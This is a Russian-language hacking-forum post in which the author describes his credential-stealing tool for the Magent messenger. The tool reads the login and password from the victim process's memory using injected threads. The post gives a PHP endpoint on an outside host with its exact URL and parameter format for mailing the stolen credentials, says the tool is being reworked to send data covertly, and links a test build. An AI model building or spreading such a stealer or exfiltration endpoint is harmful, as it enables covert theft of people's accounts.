Показать сообщение отдельно

Старый 14.01.2007, 11:26
darkf0x
Новичок
Провел на форуме:
51085

Цитата:
Сообщение от Ci5  
Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.
Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =)

Так на сегодняшний день уже:
1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль)
2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты!
Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta...
3. Написал скрипт на php, лежит на
darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту!
Вызывает так:
darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваш почта>
сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL...

Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex